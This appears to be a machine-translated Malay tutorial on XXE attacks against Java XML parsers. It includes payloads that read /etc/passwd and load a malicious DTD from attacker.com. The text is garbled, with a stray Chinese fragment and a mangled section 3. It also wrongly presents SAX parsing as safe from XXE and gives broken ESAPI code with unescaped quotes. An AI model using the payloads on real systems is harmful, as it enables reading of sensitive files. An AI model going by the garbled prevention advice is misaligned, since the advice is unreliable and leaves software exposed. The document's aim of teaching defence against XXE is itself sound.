Serangan dan pencegahan entiti luaran XML dalam Java

Serangan dan Pencegahan Entiti Luar XML di Java

Pengenalan:
XML (Bahasa Penanda Boleh Diperluas) digunakan secara meluas dalam banyak aplikasi dan ia merupakan format universal untuk menyimpan dan menghantar data. Walau bagaimanapun, disebabkan oleh kelemahan keselamatan dalam pemprosesan XML, seperti serangan Entiti Luar XML (Entiti Luar XML, XXE), aplikasi terdedah kepada serangan, jadi kami perlu mencegah dan melindungi daripada serangan XXE. Artikel ini akan memperkenalkan prinsip serangan XXE, teknik serangan biasa dan menyediakan beberapa langkah pencegahan dan contoh kod biasa.

1. Apakah serangan entiti luaran XML?
Serangan entiti luaran XML merujuk kepada penyerang yang mengeksploitasi kelemahan dalam pemproses XML untuk memperkenalkan entiti luaran dan membaca fail sensitif atau melakukan operasi berniat jahat. Entiti luaran XML ialah mekanisme khas untuk merujuk dokumen atau sumber luaran Dalam keadaan biasa, ia boleh membantu aplikasi mendapatkan beberapa data yang berguna. Walau bagaimanapun, penyerang boleh membina entiti berniat jahat untuk membaca fail tempatan, fail jauh dan juga melaksanakan arahan.

2. Teknik serangan biasa

1. serangan pernyataan DOCTYPE
   Penyerang boleh mencetuskan serangan XXE dengan membina pernyataan DOCTYPE yang berniat jahat. Contohnya:

   <!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd">
   ]>

   Dalam kod di atas, penyerang menggunakan fail XML yang diisytiharkan oleh DOCTYPE声明定义了一个实体xxe，它引用了/etc/passwd文件，攻击者可以通过解析含有这个DOCTYPE dan berjaya membaca fail sensitif itu.

2. Serangan Entiti URL
   Penyerang boleh mencetuskan serangan XXE dengan membina entiti URL. Contohnya:

   <!ENTITY xxe SYSTEM "http://attacker.com/malicious.dtd">

   Dalam kod di atas, penyerang meletakkan fail DTD berniat jahat pada pelayan jauh dan membaca serta melaksanakan fail dengan merujuk URL.

3 Penghurai DOM, yang mempunyai penggunaan memori yang lebih rendah dan tidak menyokong sambungan entiti, dengan itu mengelakkan risiko serangan XXE. Berikut ialah kod sampel untuk menghuraikan XML menggunakan penghurai SAX:

SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
XMLHandler handler = new XMLHandler();
saxParser.parse(new File("example.xml"), handler);

1. Lumpuhkan penghuraian entiti luaran

   Kami boleh melumpuhkan penghuraian entiti luaran semasa proses penghuraian XML, dengan itu menghalang serangan XXE. Berikut ialah kod contoh untuk melumpuhkan penghuraian entiti luaran menggunakan penghurai DOM:
   

   DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
   factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
   DocumentBuilder builder = factory.newDocumentBuilder();
   Document document = builder.parse(new File("example.xml"));

2. Gunakan penghurai XML yang selamat

   Menggunakan penghurai XML yang selamat boleh memberikan keupayaan pertahanan yang lebih kukuh, seperti yang disediakan dalam OWASP ESAPI untuk pertahanan terhadap XXE Attack-safe Penghurai XML. Berikut ialah contoh kod untuk menghuraikan XML menggunakan OWASP ESAPI:
   

   String xmlContent = "<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>";
   String safeContent = ESAPI.encoder().canonicalize(xmlContent);
   SAXParserFactory factory = SAXParserFactory.newInstance();
   SAXParser parser = ESAPI.securityConfiguration().getSAXFactory().newSAXParser();
   parser.parse(new InputSource(new StringReader(safeContent)), new DefaultHandler());

3. Kesimpulan:

   Serangan entiti luaran XML ialah kelemahan keselamatan biasa yang boleh membaca maklumat sensitif atau melakukan operasi berniat jahat dengan membina fail XML berniat jahat. Untuk melindungi aplikasi daripada serangan XXE, kami boleh mengambil satu siri langkah pertahanan, seperti menggunakan penghurai SAX, melumpuhkan penghuraian entiti luaran dan menggunakan penghurai XML yang selamat. Dengan langkah berjaga-jaga ini, kami boleh meningkatkan keselamatan aplikasi kami dan mengurangkan risiko serangan XXE.
   

Atas ialah kandungan terperinci Serangan dan pencegahan entiti luaran XML dalam Java. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!